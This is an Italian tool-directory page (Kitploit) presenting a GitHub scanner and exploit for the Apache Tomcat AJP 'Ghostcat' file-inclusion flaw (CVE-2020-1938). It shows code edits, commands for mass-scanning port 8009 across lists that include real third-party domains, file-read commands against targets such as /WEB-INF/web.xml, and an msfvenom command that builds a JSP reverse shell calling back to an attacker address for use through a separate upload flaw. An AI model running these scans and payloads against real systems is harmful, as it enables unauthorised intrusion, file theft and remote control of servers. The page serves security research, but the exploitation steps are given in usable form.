Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CNVD-2020-10487 — Strumenti di rilevamento per CVE-2020-1938 / CNVD-2020-1048 | Kitploit
Strumenti/GitHubGitHub/doggycheng/cnvd-2020-10487
Scanner di VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

Strumenti di rilevamento per CVE-2020-1938 / CNVD-2020-1048

Vedi Repository
866 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione

Lo strumento è destinato esclusivamente alla ricerca di sicurezza e a verifiche interne. È vietato utilizzarlo per attacchi illegali. Le conseguenze sono a carico dell'utente.

Strumento di rilevamento batch per la vulnerabilità di inclusione file in Apache Tomcat (CVE-2020-1938 / CNVD-2020-1048).

Questo progetto è una modifica basata sul progetto di Kit4y.

Modifiche al codice

Quando in ip.txt c'è un solo dominio o IP, threadCount diventa 1 e il programma di fatto non viene eseguito. È stato aggiunto un controllo sul numero di thread.

root@kitploit:~
...
if threadCount == 1:
    threadCount = 2
for i in range(0,threadCount-1):
...
Sono state apportate piccole modifiche al codice per garantire la compatibilità con Python3. Codice prima della modifica:
root@kitploit:~
self.stream = self.socket.makefile("rb", bufsize=0)
root@kitploit:~
print("".join([d.data for d in data]))
Codice dopo la modifica:
root@kitploit:~
if sys.version_info < (3, 0):
    self.stream = self.socket.makefile("rb", bufsize=0)
else:
    self.stream = self.socket.makefile("rb", buffering=None)
root@kitploit:~
if sys.version_info < (3, 0):
    print("".join([d.data for d in data]))
else:
    print(b"".join([d.data for d in data]).decode("UTF-8"))

Utilizzo

Rilevamento batch

1. Inserire i domini/IP da scansionare in ip.txt, ad esempio:

127.0.0.1
www.baidu.com
www.google.com

2. python threading-find-port-8009.py

Scansiona i domini/IP in ip.txt per trovare quelli con la porta 8009 aperta e li salva in 8009.txt generato.

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

Filtra da 8009.txt gli URL che corrispondono alla vulnerabilità e li inserisce in vul.txt. Alla fine, i domini presenti in vul.txt sono quelli affetti dalla vulnerabilità.

Rilevamento singolo sito

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

Attraversamento directory e reverse shell

Per default viene letto ROOT sotto webapps; modificando “/asdf” in “/test/asdf” è possibile accedere al contenuto della directory test sotto webapps.

root@kitploit:~
t.perform_request('/asdf',attributes=[

Se il server presenta anche una vulnerabilità di upload file, caricare il seguente shell.txt:

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt

Modificare “/asdf” in “/asdf.jsp”, avviare MSF e utilizzare lo strumento PoC per ottenere una shell.

Altri strumenti correlati

https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487

Scarica lo strumento